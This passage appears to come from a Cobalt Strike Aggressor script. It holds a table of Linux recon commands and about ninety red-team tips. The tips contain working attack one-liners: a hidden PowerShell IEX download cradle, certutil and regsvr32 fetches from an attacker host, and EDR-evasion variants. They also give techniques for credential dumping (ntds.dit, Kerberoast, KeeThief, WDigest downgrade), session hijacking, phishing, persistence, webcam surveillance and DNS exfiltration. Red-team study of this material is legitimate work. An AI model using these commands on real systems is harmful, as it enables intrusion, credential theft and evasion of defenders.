'View status of apache2 service', tags => @( 341 | 'linux', 'apache2', 'service', 'status', 'web' 342 | ) 343 | ), 344 | %(cmd => 'cat /etc/resolv.conf', desc => 'View the DNS entries for your Linux distro', tags => @( 345 | 'linux', 'cat', 'etc', 'resolv.conf', 'DNS', 'distro' 346 | ) 347 | ), 348 | %(cmd => 'cat /etc/networks', desc => 'View Linux network configuration', tags => @( 349 | 'linux', 'cat', 'etc', 'networks', 'config' 350 | ) 351 | ), 352 | %(cmd => 'iptables -L', desc => 'Display all iptables rules', tags => @( 353 | 'linux', 'iptables', 'networking', 'rules', 'ACL' 354 | ) 355 | ), 356 | %(cmd => 'iptables -L -t nat', desc => 'Display all natting iptables rules', tags => @( 357 | 'linux', 'iptables', 'nat', 'rules', 'ACL' 358 | ) 359 | ), 360 | %(cmd => 'lsof -i', desc => 'List the files that are open by which process', tags => @( 361 | 'linux', 'lsof', 'list', 'files', 'process', 'open' 362 | ) 363 | ), 364 | %(cmd => 'cat /etc/services', desc => 'View services that client applications use', tags => @( 365 | 'linux', 'cat', 'etc', 'services', 'client', 'applications' 366 | ) 367 | ), 368 | %(cmd => 'grep 80 /etc/services', desc => 'View services that utilize port 80', tags => @( 369 | 'linux', 'grep', '80', 'web', 'services', 'port' 370 | ) 371 | ), 372 | %(cmd => 'w', desc => 'Display who is logged into the Linux and Unix-like server, and what they are doing at command execution time', tags => @( 373 | 'linux', 'w', 'logged', 'login', 'command', 'execution' 374 | ) 375 | ), 376 | %(cmd => 'route -n', desc => 'Display the route table for Linux/Debian based systems', tags => @( 377 | 'linux', 'route', '-n', 'routing', 'network', 'recon' 378 | ) 379 | ), 380 | %(cmd => 'cat /etc/passwd', desc => 'Display the contents of /etc/passwd', tags => @( 381 | 'linux', 'cat', 'etc', 'passwd', 'password', 'recon' 382 | ) 383 | ), 384 | %(cmd => 'cat /etc/passwd | awk -F : \'{if (\$3 > 999 && \$3 < 60001) print \$1,\$3,\$6}\'', desc => 'Display only users of /etc/passwd', tags => @( 385 | 'linux', 'cat', 'etc', 'passwd', 'awk', 'regex', 'password', 'recon' 386 | ) 387 | ), 388 | %(cmd => 'cat /etc/motd', desc => 'Display the message of the day for any sensitive info', tags => @( 389 | 'linux', 'cat', 'etc', 'motd', 'information', 'recon' 390 | ) 391 | ), 392 | %(cmd => 'cat /etc/group', desc => 'Display the groups in /etc/group', tags => @( 393 | 'linux', 'cat', 'etc', 'group', 'recon' 394 | ) 395 | ), 396 | %(cmd => 'cat /etc/shadow', desc => 'Display the password hashes (Must be root)', tags => @( 397 | 'linux', 'cat', 'etc', 'shadow', 'password', 'hashes', 'recon' 398 | ) 399 | ), 400 | ); 401 | 402 | @tips = @( 403 | %(tips => 'Use the built in net commands with Beacon! [help net]', tags => @( 404 | 'net', 'networking', 'config', 'utility', 'recon', 'enum', 'domain', 'display' 405 | ) 406 | ), 407 | %(tips => 'Run C:\\Windows\\System32\\gatherNetworkInfo.vbs script and check results inside C:\\Windows\\System32\\Config', tags => @( 408 | 'vbscript', 'networking', 'config', 'utility', 'recon', 'enum', 'script' 409 | ) 410 | ), 411 | %(tips => 'RunDll32.exe user32.dll,LockWorkStation - Locks a users workstation', tags => @( 412 | 'rundll32', 'lock', 'workstation', 'user', 'effects' 413 | ) 414 | ), 415 | %(tips => 'dir /s /h:a *.* - displays all hidden files', tags => @( 416 | 'dir', 'display', 'hidden', 'files', 'listing' 417 | ) 418 | ), 419 | %(tips => 'netsh interface portproxy add v4tov4 listenport=port listenaddress=IP connectaddress=remote_ip connectport=remote_port - setup reverse port proxy on windows as a pivot', tags => @( 420 | 'netsh', 'portproxy', 'pivot', 'networking', 'interface' 421 | ) 422 | ), 423 | %(tips => 'icacls \ /grant \:F - grants full control permissions', tags => @( 424 | 'icacls', 'permissions', '', 'user', 'effects' 425 | ) 426 | ), 427 | %(tips => 'regsvr32.exe /u /n /s /i:http://ip/payload.sct scrobj.dll - bypass Applocker or code execution restrictions, using regsvr32 as a one-liner', tags => @( 428 | 'regsvr32', 'one-liner', 'scrobj.dll', 'bypass', 'native', 'delivery' 429 | ) 430 | ), 431 | %(tips => 'SystemInfo /s computername - gets remote system info', tags => @( 432 | 'systeminfo', 'computer', 'system', 'recon', 'info', 'enum' 433 | ) 434 | ), 435 | %(tips => 'Need a map of the network? Run Bloodhound or SharpHound for faster polling!!', tags => @( 436 | 'network', 'map', 'topology', 'BloodHound', 'SharpHound' 437 | ) 438 | ), 439 | %(tips => 'Always check sysvols!! Domain Controllers will have them, most sysvols are viewable by normal users.', tags => @( 440 | 'sysvol', 'domain controller', 'enum', 'recon', 'scripts', 'share' 441 | ) 442 | ), 443 | %(tips => 'net user a specific user and see if they are executing any logon scripts, those might contain juicy information.', tags => @( 444 | 'net', 'user', 'recon', 'enum', 'logon', 'scripts' 445 | ) 446 | ), 447 | %(tips => 'Always check Desktops/Documents/Downloads/Favorites folders for trails of valuable information left behind.', tags => @( 448 | 'folders', 'information', 'recon', 'enum', 'users' 449 | ) 450 | ), 451 | %(tips => 'Find those Fileservers! Sysadmins leave behind all kinds of goodies there. Great for lateral movement as well.', tags => @( 452 | 'server', 'fileserver', 'sysadmin', 'lateral movement', 'enum', 'recon' 453 | ) 454 | ), 455 | %(tips => 'Use certutil.exe -urlcache -split -f [http://AttackerIP/RemoteFile] to download a file to the target machine.', tags => @( 456 | 'certutil', 'urlcache', 'one-liner', 'download', 'web', 'delivery' 457 | ) 458 | ), 459 | %(tips => 'The all powerful one-liner powershell.exe -w hidden -nop -ep bypass -c \"IEX ((new-object net.webclient).downloadstring(\'http://[domainname|IP]:[port]/[file]\'))\"', tags => @( 460 | 'powershell', 'one-liner', 'web-delivery', 'web', 'delivery', 'download' 461 | ) 462 | ), 463 | %(tips => 'Use tasklist /S [RemoteComputer] /SVC to see if you have access to that remote machine.', tags => @( 464 | 'tasklist', 'remote', 'authentication', 'list', 'processes' 465 | ) 466 | ), 467 | %(tips => 'Enable RDP through the registry: reg add “HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f', tags => @( 468 | 'RDP', 'registry', 'config', 'windows', 'regedit' 469 | ) 470 | ), 471 | %(tips => 'Please wrap/encode/pack your payloads if you have to drop to disk! - use veil/upx/Invoke-Obfuscation/In-Memory type of payloads', tags => @( 472 | 'pack', 'wrap', 'encode', 'upx', 'veil', 'payload', 'Invoke-Obfuscation' 473 | ) 474 | ), 475 | %(tips => 'Try to stay in memory and avoid putting files on disk. (powershell-import)', tags => @( 476 | 'Memory', 'inject', 'fileless', 'payload', 'files' 477 | ) 478 | ), 479 | %(tips => 'Live off the land!! Use what is on the target, native windows binaries are very powerful! (ex. forfiles, rundll32)', tags => @( 480 | 'native', 'windows', 'binaries', '', 'processes' 481 | ) 482 | ), 483 | %(tips => 'Use AD naming schemes to your advantage, sysadmins are lazy and use organization to help them with all the IT work they do on a daily basis.', tags => @( 484 | 'AD', 'schemes', 'sysadmins', 'IT', 'naming' 485 | ) 486 | ), 487 | %(tips => 'Enterprise Admins will almost always have the rights to move laterally to those foreign domain controllers, 9 times out of 10 they use the same password!', tags => @( 488 | 'admins', 'enterprise', 'AD', 'password', 'lateral movement', 'pivot' 489 | ) 490 | ), 491 | %(tips => 'Invoke-NinjaCopy.ps1 is super powerful and should be used to grab the ntds.dit and SYSTEM files for offline cracking.', tags => @( 492 | 'Invoke-NinjaCopy', 'powershell', 'ntds.dit', 'SYSTEM', 'password', 'cracking' 493 | ) 494 | ), 495 | %(tips => 'Have multiple points of presence on a network for longer engagements. Persistence can go a long way for Security Operations.', tags => @( 496 | 'persistence', 'presence', 'foothold', 'network', 'operations', 'security' 497 | ) 498 | ), 499 | %(tips => 'cmd.exe and powershell.exe blocked by GPO? Find a process that is user owned and started on bootup for process injection to bypass that. Try forfiles as well.', tags => @( 500 | 'cmd', 'powershell', 'GPO', 'list', 'injection', 'forfiles', 'bypass' 501 | ) 502 | ), 503 | %(tips => 'Just because you acquired initial access does not mean you stop doing recon. Network/Host Enumeration is always the most important part.', tags => @( 504 | 'initial', 'recon', 'enum', 'network', 'host', 'harvesting' 505 | ) 506 | ), 507 | %(tips => 'Invoke-ReverseDnsLookup.ps1 of powersploit finds those machines on the network that has DNS records and can provide more SA for an attacker.', tags => @( 508 | 'powershell', 'powersploit', 'network', 'machine', 'DNS', 'awareness', 'recon', 'enum' 509 | ) 510 | ), 511 | %(tips => 'Need a Temporary web server? Use Python! python -m SimpleHTTPServer [port]', tags => @( 512 | 'web', 'server', 'python', 'http', 'services' 513 | ) 514 | ), 515 | %(tips => 'Red Tip #1: Profile your victim and use their user agent to mask your traffic. Alternatively use UA from software such as Outlook.', tags => @( 516 | 'redtip', '#1', 'user agent', 'outlook', 'traffic' 517 | ) 518 | ), 519 | %(tips => 'Red tip #2: If the enemy SOC is using proxy logs for analysis. Guess what? It wont log cookies or POST body content as can be sensitive.', tags => @( 520 | 'redtip', '#2', 'SOC', 'proxy', 'analysis', 'logs', 'cookies' 521 | ) 522 | ), 523 | %(tips => 'Red tip #3: Taking a snapshot of AD can let you browse, explore and formulate future attacks if access is lost momentarily.', tags => @( 524 | 'redtip', '#3', 'snapshot', 'AD', 'attacks' 525 | ) 526 | ), 527 | %(tips => 'Red tip #4: consider using Office Template macros and replacing normal.dot for persistence in VDI environments.', tags => @( 528 | 'redtip', '#4', 'Office', 'macros', 'persistence', 'VDI' 529 | ) 530 | ), 531 | %(tips => 'Red tip #5: Do a DNS lookup for terms such as intranet, sharepoint, wiki, nessus, cyberark and many others to start intel on your target.', tags => @( 532 | 'redtip', '#5', 'DNS', 'recon', 'enum' 533 | ) 534 | ), 535 | %(tips => 'Red tip #6: Got access but need to find target? Use WMIC to query and dump the DNS Zone for a better view of assets - https://serverfault.com/questions/550385/export-all-hosts-from-dns-manager-using-powershell', tags => @( 536 | 'redtip', '#6', 'wmic', 'DNS', 'assets' 537 | ) 538 | ), 539 | %(tips => 'Red tip #7: Whether PSEXEC, WMI, PS remoting or even the recent COM execution technique for lateral movement. Dont forget beloved RDP.', tags => @( 540 | 'redtip', '#7', 'PSEXEC', 'WMI', 'powershell', 'COM', 'RDP' 541 | ) 542 | ), 543 | %(tips => 'Red tip #8: Make sure theres trackers in your: emails, delivery server and payload execution. Any more? Comment to share!', tags => @( 544 | 'redtip', '#8', 'emails', 'delivery', 'payload' 545 | ) 546 | ), 547 | %(tips => 'Red tip #9: When PowerUp yields no results, dont forget SysInternals AutoRuns. Often you can find unexpected surprises :)', tags => @( 548 | 'redtip', '#9', 'PowerUp', 'sysinternals', 'AutoRuns' 549 | ) 550 | ), 551 | %(tips => 'Red tip #10: When using BloodHound, dont forget DA equivalents such as administrators and server operators etc too. These arent mapped.', tags => @( 552 | 'redtip', '#10', 'BloodHound', 'DA', 'groups', 'mapping' 553 | ) 554 | ), 555 | %(tips => 'Red tip #11: When navigating mature environments, a good old network diagram along with AD OUs can help to shed some light into next steps.', tags => @( 556 | 'redtip', '#11', 'topology', 'network', 'AD', 'OU', 'lateral movement' 557 | ) 558 | ), 559 | %(tips => 'Red tip #12: Kerberoast them hashes, could be a fast route to domain administrator. PowerView: Invoke-Kerberoast -Format Hashcat', tags => @( 560 | 'redtip', '#12', 'Kerberoast', 'hashes', 'services', 'powershell', 'DA' 561 | ) 562 | ), 563 | %(tips => 'Red tip #13: Shared local administrator account hashes are great for lateral movement. Find machines based on the same build and attack away', tags => @( 564 | 'redtip', '#13', 'administrator', 'account', 'hashes', 'lateral movement', 'machines' 565 | ) 566 | ), 567 | %(tips => 'Red tip #14: Got extra credentials? Use different sets for separate egress channels so that if one account is disabled all the rest are ok.', tags => @( 568 | 'redtip', '#14', 'credentials', 'egress', 'channels', 'account' 569 | ) 570 | ), 571 | %(tips => 'Red tip #15: You dont need payloads when you can phish credentials and login to Citrix, VPN, email with no 2FA. Check the perimeter.', tags => @( 572 | 'redtip', '#15', 'phish', 'payload', 'Citrix', 'VPN', 'email' 573 | ) 574 | ), 575 | %(tips => 'Red tip #16: @dafthack MailSniper, @domchell LyncSniper can be a useful but noisy way to obtain AD credentials into an organization.', tags => @( 576 | 'redtip', '#16', 'AD', 'credentials', 'organization' 577 | ) 578 | ), 579 | %(tips => 'Red tip #17: @_staaldraad Ruler tool can be used to obtain code execution on a system running Outlook if you can access exchange externally', tags => @( 580 | 'redtip', '#17', 'Ruler', 'Outlook', 'code', 'execution', 'exchange' 581 | ) 582 | ), 583 | %(tips => 'Red tip #18: When tools like MailSniper dont work in custom environments, you still have good old @Burp_Suite to replicate the attacks', tags => @( 584 | 'redtip', '#18', 'burpsuite', 'burp', 'MailSniper' 585 | ) 586 | ), 587 | %(tips => 'Red tip #19: Need a DC? echo %LOGONSERVER%. Need a list? nltest /dclist, nslookup -q=srv _kerberos._tcp (domain suffix can autocomplete)', tags => @( 588 | 'redtip', '#19', 'DC', 'LOGONSERVER', 'nltest', 'nslookup', 'kerberos' 589 | ) 590 | ), 591 | %(tips => 'Red tip #20: So apparently not many people use SSH for redirector setup. So try out SSH c2 -R *:80:localhost:80. SSH config GatewayPorts yes', tags => @( 592 | 'redtip', '#20', 'SSH', 'redirector', 'c2', 'config' 593 | ) 594 | ), 595 | %(tips => 'Red tip #21: Found open user home shares that are accessible? See if you can drop into Startup Programs for lateral movement and privesc.', tags => @( 596 | 'redtip', '#21', 'shares', 'user', 'startup', 'privesc', 'lateral movement' 597 | ) 598 | ), 599 | %(tips => 'Red tip #22: Use VNC, microphone and webcam to perform surveillance. Netstat, tasklist can provide context into what the users doing.', tags => @( 600 | 'redtip', '#22', 'VNC', 'microphone', 'webcam', 'netstat', 'tasklist' 601 | ) 602 | ), 603 | %(tips => 'Red tip #23: Stash payloads in C:$Recycle.Bin', tags => @( 604 | 'redtip', '#23', 'payload', 'C:', 'Recycle Bin' 605 | ) 606 | ), 607 | %(tips => 'Red tip #24: Compromise the SOC and Security teams to watch their progress and track their email alerts for sophisticated threats', tags => @( 608 | 'redtip', '#24', 'SOC', 'Security', 'email', 'phish', 'alerts' 609 | ) 610 | ), 611 | %(tips => 'Red tip #25: Probably dont do this on a red team, but spray for Welcome1, Password1 if youre struggling to move. But move off fast.', tags => @( 612 | 'redtip', '#25', 'password', 'spray', 'cracking' 613 | ) 614 | ), 615 | %(tips => 'Red tip #26: Split your campaigns up so that they are independent. Fire tons at once for decoys and to burn out the defense.', tags => @( 616 | 'redtip', '#26', 'campaign', 'fire', 'defense' 617 | ) 618 | ), 619 | %(tips => 'Red tip #27: Need more credentials? Search for passwords on Sharepoint, and intranet.', tags => @( 620 | 'redtip', '#27', 'credentials', 'password', 'Sharepoint', 'intranet' 621 | ) 622 | ), 623 | %(tips => 'Red tip #28: Look for asset registers to understand who owns what machine, make and model. Theres usually an asset label to host name too!', tags => @( 624 | 'redtip', '#28', 'asset', 'machine', 'host' 625 | ) 626 | ), 627 | %(tips => 'Red tip #29: Lateral movement: printers, open webroots, good old Tomcat, what are your quick wins?', tags => @( 628 | 'redtip', '#29', 'lateral movement', 'printers', 'webroots', 'tomcat' 629 | ) 630 | ), 631 | %(tips => 'Red tip #30: Get AD credentials? Turn up on site and you might be able to use them to login to Corporate Wifi :)', tags => @( 632 | 'redtip', '#30', 'AD', 'credentials', 'site', 'login', 'wifi' 633 | ) 634 | ), 635 | %(tips => 'Red tip #31: Hunting e-mails and network shares for penetration testing reports can often yield good results.', tags => @( 636 | 'redtip', '#31', 'emails', 'network', 'shares', 'reports' 637 | ) 638 | ), 639 | %(tips => 'Red tip #32: List mounts: net use, look for shared folders and drop a UNC icon LNK into it. Run Inveigh or Wireshark on host to grab hashes.', tags => @( 640 | 'redtip', '#32', 'mount', 'list', 'net', 'shared', 'folders', 'LNK', 'Inveigh', 'Wireshark' 641 | ) 642 | ), 643 | %(tips => 'Red tip #33: Orgs are transitioning to cloud services such as AWS, Beanstalk, O365, Google Apps. 2FA is vital - password reset to compromise.', tags => @( 644 | 'redtip', '#33', 'cloud', 'services', 'AWS', 'O365', 'password', 'Apps' 645 | ) 646 | ), 647 | %(tips => 'Red tip #34: OpSec. Set notifications to your phone for logins or intrusion attempts in any part of your attack infrastructure.', tags => @( 648 | 'redtip', '#34', 'Opsec', 'notification', 'phone', 'login', 'infrastructure' 649 | ) 650 | ), 651 | %(tips => 'Red tip #35: FireEye sandbox flagging your payloads? Try anti sandbox techniques! If not, just use HTA to get into memory as it doesnt scan', tags => @( 652 | 'redtip', '#35', 'FireEye', 'sandbox', 'payload', 'HTA', 'memory' 653 | ) 654 | ), 655 | %(tips => 'Red tip #36: Dont forget the good old GPP passwords in SYSVOL. There may be cached GPP on the machine. Applying the patch isnt enough', tags => @( 656 | 'redtip', '#37', 'GPP', 'password', 'SYSVOL', 'machine', 'patch' 657 | ) 658 | ), 659 | %(tips => 'Red tip #37: Use GenHTA to generate HTA files that use anti-sandboxing techniques. https://github.com/vysec/GenHTA', tags => @( 660 | 'redtip', '#37', 'GenHTA', 'HTA', 'files', 'sandbox' 661 | ) 662 | ), 663 | %(tips => 'Red tip #38: Having trouble getting @armitagehacker CobaltStrikes evil.hta through defenses? https://github.com/vysec/MorphHTA', tags => @( 664 | 'redtip', '#38', 'CobaltStrike', 'HTA', 'morphHTA' 665 | ) 666 | ), 667 | %(tips => 'Red tip #39: If emails get bounced, read the email! Sometimes due to malware scanners, spam etc. Or you may even get an out of office reply.', tags => @( 668 | 'redtip', '#39', 'email', 'malware', 'scanner', 'spam' 669 | ) 670 | ), 671 | %(tips => 'Red tip #40: @0x09AL suggests looking for default credentials on printers and embedded devices. Move off initial foothold using this.', tags => @( 672 | 'redtip', '#40', 'credentials', 'printers', 'devices', 'foothold' 673 | ) 674 | ), 675 | %(tips => 'Red tip #41: @Oddvarmoe suggests using Alternate Data Streams if you need to put a file on disk. For example https://github.com/samratashok/nishang/blob/master/Backdoors/Invoke-ADSBackdoor.ps1', tags => @( 676 | 'redtip', '#41', 'ADS', 'Data', 'Streams', 'file', 'disk' 677 | ) 678 | ), 679 | %(tips => 'Red tip #42: Got OS level access to a middle tier? Task list, netstat and wmic process list full | findstr /I commandline for more ideas!', tags => @( 680 | 'redtip', '#42', 'OS', 'access', 'tier', 'wmic', 'process', 'list', 'findstr' 681 | ) 682 | ), 683 | %(tips => 'Red tip #43: So you know where the server application files are. Download the binaries and check out configuration files for conn. strings', tags => @( 684 | 'redtip', '#43', 'server', 'files', 'application', 'binaries', 'config' 685 | ) 686 | ), 687 | %(tips => 'Red tip #44: Run PEiD and other packer / technology checkers to find out the language and packer used on downloaded server binaries.', tags => @( 688 | 'redtip', 'PEiD', 'packer', 'language', 'binaries' 689 | ) 690 | ), 691 | %(tips => 'Red tip #45: Run strings on the application binary for potentially other cleartext sensitive strings! (Unicode mode too)', tags => @( 692 | 'redtip', '#45', 'strings', 'application', 'binary', 'cleartext' 693 | ) 694 | ), 695 | %(tips => 'Red tip #46: On a VDI? Check out C:\ and other disks for potentially sensitive files other users may have saved there.', tags => @( 696 | 'redtip', '#46', 'VDI', 'C:', 'disks', 'sensitive', 'files' 697 | ) 698 | ), 699 | %(tips => 'Red tip #47: Incase EDR are looking for "net users /domain" try using "net use /dom"', tags => @( 700 | 'redtip', '#47', 'EDR', 'net', 'users', 'domain', 'dom' 701 | ) 702 | ), 703 | %(tips => 'Red tip #48: Is EDR potentially looking for "powershell -encodedcommand"? Try "powershell -ec"', tags => @( 704 | 'redtip', '#48', 'EDR', 'powershell', 'encoded', 'command' 705 | ) 706 | ), 707 | %(tips => 'Red tip #49: Attacking a heavy Macintosh or Linux estate? Send a Office Maldoc with OS checking logic to obtain footholds on either system', tags => @( 708 | 'redtip', '#49', 'Mac', 'linux', 'Office', 'OS', 'foothold' 709 | ) 710 | ), 711 | %(tips => 'Red tip #50: Carbon Black checks for IEX and web req commands. Use powershell "powershell . (nslookup -q=txt calc.vincentyiu.co.uk )[-1]"', tags => @( 712 | 'redtip', '#50', 'Carbon Black', 'IEX', 'web', 'powershell' 713 | ) 714 | ), 715 | %(tips => 'Red tip #51: Cant open C drive? Try \127.0.0.1\c$', tags => @( 716 | 'redtip', '#51', 'C:', '127.0.0.1', 'c$' 717 | ) 718 | ), 719 | %(tips => 'Red tip #52: SC doesnt take credentials. Cant use runas? Try net use \targetip\ipc$ password /u:domain\username then sc to psexec', tags => @( 720 | 'redtip', '#52', 'SC', 'credentials', 'runas', 'target', 'ip', 'password', 'domain', 'psexec' 721 | ) 722 | ), 723 | %(tips => 'Red tip #53: When stick phishing for 2FA, consider using @mrgretzky Evilginx project which logs cookies. https://breakdev.org/evilginx-1-1-release/', tags => @( 724 | 'redtip', '#53', 'phishing', 'evilginx', 'logs', 'cookies' 725 | ) 726 | ), 727 | %(tips => 'Red tip #54: Hide from blue. Volume shadow copy then execute \?\GLOBALROOT\Device\HarddiskVolumeShadowColy1\malware.exe/dll then delete VSC', tags => @( 728 | 'redtip', '#54', 'hidden', 'VSS', 'shadow', 'copy', 'execute', 'VSC' 729 | ) 730 | ), 731 | %(tips => 'Red tip #55: SMB hash leaking using a UNC path for image in page for drive by leak can give you credentials for less mature environments.', tags => @( 732 | 'redtip', '#55', 'SMB', 'hash', 'UNC', 'credentials' 733 | ) 734 | ), 735 | %(tips => 'Red tip #56: Target victims using email authentication such as Microsoft Account on Windows 10? Hash leak exposes full email address!', tags => @( 736 | 'redtip', '#56', 'target', 'email', 'authentication', 'microsoft', 'windows' 737 | ) 738 | ), 739 | %(tips => 'Red tip #57: Working in teams yields better results; and best of all Makes Offensive operations more fun and keeps the adrenaline pumping', tags => @( 740 | 'redtip', '#57', 'team', 'operations', 'red' 741 | ) 742 | ), 743 | %(tips => 'Red tip #58: Discuss business targets and objectives with your clients. This process should set non technical goals such as "ATM spit money"', tags => @( 744 | 'redtip', '#58', 'business', 'targets', 'objectives', 'client', 'goals' 745 | ) 746 | ), 747 | %(tips => 'Red tip #59: Checking whether a server or host is good for egress? Likely to go down? "systeminfo | findstr /i boot"', tags => @( 748 | 'redtip', '#59', 'server', 'host', 'egree', 'systeminfo' 749 | ) 750 | ), 751 | %(tips => 'Red tip #60: Type "query user" to see who else is connected to the machine.', tags => @( 752 | 'redtip', '#60', 'query', 'user', 'machine' 753 | ) 754 | ), 755 | %(tips => 'Red tip #61: Get a quick patch list using wmic qfe list brief. Cross ref KB to bulletins.', tags => @( 756 | 'redtip', '#61', 'patch', 'wmic', 'qfe', 'KB' 757 | ) 758 | ), 759 | %(tips => 'Red tip #62: Found a process of interest? Dont forget to obtain a MiniDump! Use Out-MiniDump https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Out-Minidump.ps1', tags => @( 760 | 'redtip', '#62', 'process', 'Minidump', 'powershell' 761 | ) 762 | ), 763 | %(tips => 'Red tip #63: Finally in CyberArk, click policies and see safes but no account? Go to accounts search and search for empty and safes show up', tags => @( 764 | 'redtip', '#63', 'CyberArk', 'policies', 'account' 765 | ) 766 | ), 767 | %(tips => 'Red tip #64: Is WebDav allowed through the gateway? Using http mini redirector? Dont exfiltrate or send in files. WebDav is subject to DLP', tags => @( 768 | 'redtip', '#64', 'webdav', 'gateway', 'http', 'redirector', 'DLP' 769 | ) 770 | ), 771 | %(tips => 'Red tip #65: WebDav mini http redirector: net use * http://totallylegit.com/share . Then start z:', tags => @( 772 | 'redtip', '#65', 'webdav', 'mini', 'http', 'redirector' 773 | ) 774 | ), 775 | %(tips => 'Red tip #66: Found potential MQ creds? ActiveMQ? Try out https://github.com/fmtn/a , works to query MQ endpoints that dont use self signed crt', tags => @( 776 | 'redtip', '#66', 'MQ', 'credentials', 'endpoints', 'crt' 777 | ) 778 | ), 779 | %(tips => 'Red tip #67: Use vssadmin to list and create volume shadow copies', tags => @( 780 | 'redtip', '#67', 'vssadmin', 'list', 'volume', 'shadow' 781 | ) 782 | ), 783 | %(tips => 'Red tip #68: Pivoting into a secure zone that has no DNS or web gateway and need exfil? Netsh port forward pivot UDP 53 to DNS 53 then boom', tags => @( 784 | 'redtip', '#68', 'pivot', 'DNS', 'web', 'gateway', 'UDP', 'exfil' 785 | ) 786 | ), 787 | %(tips => 'Red tip #69: Have blue hidden the ways including winkey+R? Try shift and right click desktop and open command prompt', tags => @( 788 | 'redtip', '#69', 'hidden', 'blue', 'winkey', 'command', 'prompt' 789 | ) 790 | ), 791 | %(tips => 'Red tip #70: Tracked down that putty session? Popped the box? Query user and check the victims logon time and idle times', tags => @( 792 | 'redtip', '#70', 'putty', 'session', 'Query', 'user', 'logon', 'time' 793 | ) 794 | ), 795 | %(tips => 'Red tip #71: Hijack his Session using sc create sesshijack binpath= "cmd.exe /k tscon /dest:" then use putty session', tags => @( 796 | 'redtip', '#71', 'session', 'sc', 'hijack', 'putty', 'cmd.exe' 797 | ) 798 | ), 799 | %(tips => 'Red tip #72: Most people understand email sec wrong. SPF does not mean not spoofable. SPF does nothing without DMARC.', tags => @( 800 | 'redtip', '#72', 'email', 'SPF', 'DMARC' 801 | ) 802 | ), 803 | %(tips => 'Red tip #73: Weak DMARC on victim org domain? Spoof their own emails back into themselves! You even inherit their AD name and photo', tags => @( 804 | 'redtip', '#73', 'DMARC', 'domain', 'spoof', 'emails', 'AD' 805 | ) 806 | ), 807 | %(tips => 'Red tip #74: Got access to Microsoft OWA mailbox or O365? You can extract global catalog from contacts use @Burp_Suite and parse JSON object', tags => @( 808 | 'redtip', '#74', 'access', 'microsoft', 'OWA', 'mailbox', 'O365', 'burpsuite' 809 | ) 810 | ), 811 | %(tips => 'Red tip #75: Write PHP delivery scripts that can mutate your payloads and add unique trackers per download. This tracks file being executed', tags => @( 812 | 'redtip', '#75', 'PHP', 'delivery', 'scripts', 'payload', 'download', 'files' 813 | ) 814 | ), 815 | %(tips => 'Red tip #76: Simulating a criminal threat story with smash and grab agenda? Phish users and hot swap payload mid campaign to test formats', tags => @( 816 | 'redtip', '#76', 'criminal', 'agenda', 'phish', 'users', 'campaign' 817 | ) 818 | ), 819 | %(tips => 'Red tip #77: RCE on a web application for less mature client? nslookup -q=srv _ldap._tcp if its domain joined Invoke-Kerberoast', tags => @( 820 | 'redtip', '#77', 'RCE', 'web', 'application', 'client', 'nslookup', 'domain', 'kerberoast' 821 | ) 822 | ), 823 | %(tips => 'Red tip #78: @benichmt1 suggests looking for vmdk files across the network. You can use this to potentially access segregated networks', tags => @( 824 | 'redtip', '#78', 'vmdk', 'files', 'network', 'access' 825 | ) 826 | ), 827 | %(tips => 'Red tip #79: Obfuscation is never bad, especially when its a button click. @danielhbohannon - https://github.com/danielbohannon', tags => @( 828 | 'redtip', '#79', 'Obfuscation', 'danielbohannon' 829 | ) 830 | ), 831 | %(tips => 'Red tip #80: Need to sweep for uptimes? Use wmic /node:"" OS get LastBootUpTime in a for loop', tags => @( 832 | 'redtip', '#80', 'uptime', 'wmic', 'OS' 833 | ) 834 | ), 835 | %(tips => 'Red tip #81: Looking for systems running KeePass? Run a for loop on wmic /node:"host" process list brief :) then look at RT #82', tags => @( 836 | 'redtip', '#81', 'sytems', 'KeePass', 'wmic', 'host', 'process', 'list' 837 | ) 838 | ), 839 | %(tips => 'Red tip #82: Found KeePass running in memory? Use @harmj0y KeeThief to extract password and dl the KDBX - https://github.com/HarmJ0y/KeeThief', tags => @( 840 | 'redtip', '#82', 'KeePass', 'memory', 'harmj0y', 'KeeThief', 'password' 841 | ) 842 | ), 843 | %(tips => 'Red tip #83: Struggling to find a working DB client? Live off the land and use your victims in an RDP session.', tags => @( 844 | 'redtip', '#83', 'DB', 'client', 'RDP', 'session' 845 | ) 846 | ), 847 | %(tips => 'Red tip #84: Im sure everyone hates Oracle DB but no sweat, you can proxycap sqldeveloper.exe', tags => @( 848 | 'redtip', '#84', 'Oracle', 'DB', 'proxycap', 'sql' 849 | ) 850 | ), 851 | %(tips => 'Red tip #85: Check the users calendars before using persistence on their machine. They may be out of office and screw your master plans.', tags => @( 852 | 'redtip', '#85', 'users', 'calendars', 'persistence', 'machine', 'office' 853 | ) 854 | ), 855 | %(tips => 'Red tip #86: Red team and attack simulation is not penetration testing. You shouldnt be really testing anything, but simply infiltrating.', tags => @( 856 | 'redtip', '#86', 'red team', 'attack', 'testing', 'penetration' 857 | ) 858 | ), 859 | %(tips => 'Red tip #87: @Oddvarmoe uses .UDL files to quickly launch a MSSQL connection test to validate credentials! https://blogs.msdn.microsoft.com/farukcelik/2007/12/31/basics-first-udl-test/', tags => @( 860 | 'redtip', '#87', 'UDL', 'files', 'MSSQL', 'credentials' 861 | ) 862 | ), 863 | %(tips => 'Red tip #88: Dont forget Physical security! Whip up a PI with GSM and you can hack your way in by dropping the PI on network.', tags => @( 864 | 'redtip', '#88', 'Physical', 'security', 'PI', 'GSM', 'network' 865 | ) 866 | ), 867 | %(tips => 'Red tip #89: regsvr32 SCT files are being detected as Squigglydoo. Looks for "script" case sensitive and " @( 868 | 'redtip', '#89', 'regsvr32', 'SCT', 'files', 'squigglydoo', 'script' 869 | ) 870 | ), 871 | %(tips => 'Red tip #90: Cisco NGIPS is shit, when analysing traffic for havex it drops only but not', tags => @( 872 | 'redtip', '#90', 'Cisco', 'NGIPS', 'traffic', 'analysis' 873 | ) 874 | ), 875 | %(tips => 'Red tip #91: Decoys can be as simple as burning egress by port scanning 1-1024 through IDS, or spamming dodgy emails at blocks of employees', tags => @( 876 | 'redtip', '#91', 'egress', 'port', 'scanning', 'IDS', 'emails' 877 | ) 878 | ), 879 | %(tips => 'Red tip #92: If WDigest is disabled, reenable it for cleartext credentials before new users login with @harmj0y https://github.com/HarmJ0y/Misc-PowerShell/blob/master/Invoke-WdigestDowngrade.ps1', tags => @( 880 | 'redtip', '#92', 'wdigest', 'credentials', 'login' 